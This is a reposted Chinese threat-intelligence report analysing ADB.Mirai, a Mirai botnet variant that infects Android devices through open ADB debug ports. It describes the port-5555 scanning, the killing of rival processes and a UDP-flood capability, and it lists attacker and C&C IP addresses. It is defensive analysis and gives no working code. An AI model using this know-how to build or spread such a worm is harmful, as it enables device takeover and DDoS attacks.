转载ADB. MIRAI: 利用ADB调试接口进行传播的MIRAI新型变种僵尸网络
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;"><span style="color:#777777;font-family:宋体;">早在今年年初,国内外安全厂商已监测到利用开放了</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">调试接口的安卓设备进行传播的挖矿蠕虫,近期绿盟伏影实验室威胁被动感知系统再次捕获到利用</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">接口进行传播的具有</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">DDoS</span><span style="color:#777777;font-family:宋体;">功能的僵尸网络。经过样本分析人员研究发现,该僵尸网络家族是</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Mirai</span><span style="color:#777777;font-family:宋体;">的又一新变种(作者命名为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Darks</span><span style="color:#777777;font-family:宋体;">),并且与年初的挖矿样本扫描行为部分具有高度相似性。不同的是年初的样本功能为挖矿,而当前样本功能为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">DDOS</span><span style="color:#777777;font-family:宋体;">,推测与最近一段时间虚拟货币行业不景气有关。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">前言</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">早在今年年初,国内外安全厂商已监测到利用开放了</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">调试接口的安卓设备进行传播的挖矿蠕虫,近期绿盟伏影实验室威胁被动感知系统再次捕获到利用</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">接口进行传播的具有</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">DDoS</span><span style="color:#777777;font-family:宋体;">功能的僵尸网络。经过样本分析人员研究发现,该僵尸网络家族是</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Mirai</span><span style="color:#777777;font-family:宋体;">的又一新变种(作者命名为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Darks</span><span style="color:#777777;font-family:宋体;">),并且与年初的挖矿样本扫描行为部分具有高度相似性。不同的是年初的样本功能为挖矿,而当前样本功能为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">DDOS</span><span style="color:#777777;font-family:宋体;">,推测与最近一段时间虚拟货币行业不景气有关。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">该样本和以前捕获的一组样本来自于同一个下载源,从代码特征等因素判断为同一作者制作,我们命名此新恶意样本为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">。此次捕获的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">从早期针对弱口令进行爆破攻击传播感染,转变为利用</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">接口进行传播感染。此次恶意样本极可能快速抢占</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Miner</span><span style="color:#777777;font-family:宋体;">感染设备,获取新的肉鸡资源进行</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">DDOS</span><span style="color:#777777;font-family:宋体;">攻击,同时,我们推测同样快速抢占挖矿肉鸡,或挖矿类蠕虫木马更新迭代,转向更具威胁性攻击行为的僵尸网络或蠕虫木马极可能会迅速多,请注意防范。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">伏影实验室威胁被动感知系统</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">网络安全发展至今特别是随着威胁情报的兴起和虚拟化技术的不断发展,欺骗技术也越来越受到各方的关注。欺骗技术就是威胁感知系统关键技术之一。它的高保真、高质量、鲜活性等特征,使之成为研究敌人的重要手段,同时实时捕获一手威胁时间不再具有滞后性,非常适合威胁情报的时效性需求。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">绿盟伏影实验室于</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">2017</span><span style="color:#777777;font-family:宋体;">年中旬运营了一套威胁被动感知系统,发展至今已逐步成熟,感知节点遍布世界五大洲,覆盖了</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">20</span><span style="color:#777777;font-family:宋体;">多个国家,覆盖常见服务、</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IOT</span><span style="color:#777777;font-family:宋体;">服务,工控服务等。形成了以全端口模拟为基础,智能交互服务为辅的混合型感知架构,每天从互联网中捕获大量的鲜活威胁情报,实时感知威胁。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Darks</span><span style="color:#777777;font-family:宋体;">蠕虫蠕虫病毒就是被俘于威胁被动感知系统。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">攻击事件总览</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">我们威胁感知系统于</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">11</span><span style="color:#777777;font-family:宋体;">月</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">19</span><span style="color:#777777;font-family:宋体;">日首次感知到来自于</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">102.103.123.54</span><span style="color:#777777;font-family:宋体;">的攻击,之后连续七天都收到多个被感染</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP</span><span style="color:#777777;font-family:宋体;">发来的相同攻击</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Payload</span><span style="color:#777777;font-family:宋体;">。此次攻击针对的是</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">TCP</span><span style="color:#777777;font-family:宋体;">的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">5555</span><span style="color:#777777;font-family:宋体;">端口,分析发现,受害</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP</span><span style="color:#777777;font-family:宋体;">通过扫描开放了</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">调试端口的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Android</span><span style="color:#777777;font-family:宋体;">设备,并利用其调试功能的可执行能力进行感染传播。攻击者在成功投放并执行</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">bash</span><span style="color:#777777;font-family:宋体;">脚本后,会从远端的服务器下载多平台恶意样本,使被攻击主机作为肉鸡继续对外发起扫描。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Android Debug Bridge(ADB)</span><span style="color:#777777;font-family:宋体;">是安卓系统为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Android</span><span style="color:#777777;font-family:宋体;">开发人员提供的开放接口和调试工具,通过</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">可以管理、操作</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Android</span><span style="color:#777777;font-family:宋体;">模拟器和实体设备,如安装软件、查看设备软硬件参数、系统升级、运行</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">shell</span><span style="color:#777777;font-family:宋体;">命令等。在互联网上存在一些未设置权限控制,没有任何密码,高权限的情况对外开放了</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB</span><span style="color:#777777;font-family:宋体;">接口的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Android</span><span style="color:#777777;font-family:宋体;">设备,如智能手机,智能电视,机顶盒等,此次受感染正是这些设备。此样本具备蠕虫特性,受感染设备会继续尝试感染并投递恶意代码。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">事件关联</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">通过最新捕获的恶意样本提取到得</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">C&C</span><span style="color:#777777;font-family:宋体;">地址,我们威胁被动感知系统中查到首次攻击时间为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">2018</span><span style="color:#777777;font-family:宋体;">年</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">10</span><span style="color:#777777;font-family:宋体;">月</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">21</span><span style="color:#777777;font-family:宋体;">日,当时使用的攻击方式为</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">telnet</span><span style="color:#777777;font-family:宋体;">服务弱口令爆破进行传播</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">(</span><b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;">Telnet.Mirai</span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">)</span><span style="color:#777777;font-family:宋体;">。对比</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">2</span><span style="color:#777777;font-family:宋体;">次样本的传播感染行为,能判断利用此</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">C&C</span><span style="color:#777777;font-family:宋体;">地址投放行为与恶意代码结构等特性,我们判断</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">2</span><span style="color:#777777;font-family:宋体;">次行为背后是同一黑产组织。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="center" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:center;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">样本的传播时间对比</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<img width="554" height="351" src="https://www.2k8.org/content/uploadfile/202211/26/0ffd5135.png" alt="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">捕获样本分析</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">-ADB.Mirai</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:15.0pt;">功能描述</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:12.0pt;">蠕虫式感染</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">通过利用安卓设备的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">adb</span><span style="color:#777777;font-family:宋体;">接口进行传播,通过随机生成</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">359</span><span style="color:#777777;font-family:宋体;">个</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">IP</span><span style="color:#777777;font-family:宋体;">地址,并对其</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">5555</span><span style="color:#777777;font-family:宋体;">端口进行扫描,判断是否可能存在可利用目标。下图为攻击</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">payload</span><span style="color:#777777;font-family:宋体;">部分。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<img width="424" height="310" src="https://www.2k8.org/content/uploadfile/202211/26/78918b13.png" alt="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:12.0pt;">排他性</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">通过查看</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"> /proc/pid/ </span><span style="color:#777777;font-family:宋体;">来检查进程信息,该目录下通常有一个</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">maps</span><span style="color:#777777;font-family:宋体;">文件,代表内存映射中加载的库与文件。样本通过检查</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">maps</span><span style="color:#777777;font-family:宋体;">文件中有无特定内容(</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">“/tmp/”</span><span style="color:#777777;font-family:宋体;">),若有则将相关信息发送至</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">cc</span><span style="color:#777777;font-family:宋体;">服务器后将进程杀掉。此举的目的在于杀掉其他可能的恶意程序。让自身能够享受被感染机器更多的资源。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">DDoS</span></b><b><span style="color:#1E1E1E;font-family:宋体;font-size:12.0pt;">攻击</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span style="color:#777777;font-family:宋体;">目前我们仅分析到一个</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">UDP-Flood</span><span style="color:#777777;font-family:宋体;">攻击函数,并且通过样本的分析,我们发现样本在与</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">C&C</span><span style="color:#777777;font-family:宋体;">通信之前也仅发现初始化函数链表中仅有一个</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">UDP-Flood</span><span style="color:#777777;font-family:宋体;">函数。推测样本应该还属于开发中。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span lang="EN-US" style="border:none windowtext 1.0pt;color:#777777;font-family:inherit,serif;padding:0cm;"> </span></b><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:15.0pt;">新样本与旧样本对比</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:15.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:12.0pt;">旧样本命名:</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;">Telnet.Mirai</span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">正如时间关联中我们描述的一样,我们还获得了一个通过</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">telnet</span><span style="color:#777777;font-family:宋体;">扫描的样本,将其命名为:</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Telnet.Mirai</span><span style="color:#777777;font-family:宋体;">。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:12.0pt;">差异性对比</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:12.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">通过使用</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">bindiff</span><span style="color:#777777;font-family:宋体;">软件对比</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">和</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Telnet.Mirai</span><span style="color:#777777;font-family:宋体;">两个样本。我们发现这两个样本相似度非常高。仅有几个函数是存在很大差异,其中一个杀死其他进程的函数是</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">新添加的函数。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">另外对比两个样本的扫描模块,我们发现</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">的扫描是由</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Telnet.Mirai</span><span style="color:#777777;font-family:宋体;">的扫描模块修改而来。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Bash</span><span style="color:#777777;font-family:宋体;">脚本使用的也不尽相同。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">使用的</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">bash</span><span style="color:#777777;font-family:宋体;">脚本相对于</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Telnet.Mirai</span><span style="color:#777777;font-family:宋体;">使用的脚本要复杂一些,增加了杀死</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">botkiller</span><span style="color:#777777;font-family:宋体;">和</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">miner bot</span><span style="color:#777777;font-family:宋体;">进程的能力。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Cambria,serif;"> </span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Bindiff</span><span style="color:#777777;font-family:宋体;">对比图如下</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<img width="516" height="210" src="https://www.2k8.org/content/uploadfile/202211/26/21785888.png" alt="" style="vertical-align:middle;" /><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">总结</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;"></span></b>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span style="color:#777777;font-family:宋体;">通过对比</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">ADB.Mirai</span><span style="color:#777777;font-family:宋体;">和</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">Telnet.Mirai</span><span style="color:#777777;font-family:宋体;">两个样本,我们不难发现,他们来自同一个</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">C&C</span><span style="color:#777777;font-family:宋体;">地址,并且从</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">10</span><span style="color:#777777;font-family:宋体;">月</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">21</span><span style="color:#777777;font-family:宋体;">日起该地址下发的样本有了新的变化,不论是感染方式,还是杀死其他进程独占被感染机器的资源。我们可以认定</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;">C&C</span><span style="color:#777777;font-family:宋体;">的拥有者,不断完善自己。未来有很大的可能获得与它相关联的新样本。</span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;margin-bottom:15.0pt;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<span lang="EN-US" style="color:#777777;font-family:Cambria,serif;"> </span><span lang="EN-US" style="color:#777777;font-family:Lato,sans-serif;"></span>
</p>
<p align="left" style="background:white;font-family:等线;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;vertical-align:baseline;">
<b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">样本来源</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;">IP</span></b><b><span style="color:#1E1E1E;font-family:宋体;font-size:18.0pt;">分析</span></b><b><span lang="EN-US" style="color:#1E1E1E;font-family:Lato,sans-serif;font-size:18.0pt;"></span></b>
</p>
<table border="1" cellpadding="0" cellspacing="0" width="1079" style="background:white;border:none;border-collapse:collapse;font-family:等线;font-size:10.5pt;width:809.5pt;">
<tbody>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">IP</span><span style="color:#777777;font-family:宋体;font-size:9.5pt;">地址</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">89.46.79.57</span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">地理位置</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:#777777;font-family:宋体;font-size:9.5pt;">意大利</span><span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;"></span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">ASN number</span>
</p>
</td>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
<p align="center" style="font-family:等线;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#777777;font-family:inherit,serif;font-size:9.5pt;">AS31034</span>
</p>
</td>
</tr>
<tr>
<td valign="bottom" width="277" style="border-bottom:solid #DDDDDD 1.0pt;border-left:none;border-right:solid #DDDDDD 1.0pt;border-top:none;padding:3.0pt 16.2pt 3.0pt 16.2pt;width:207.75pt;">
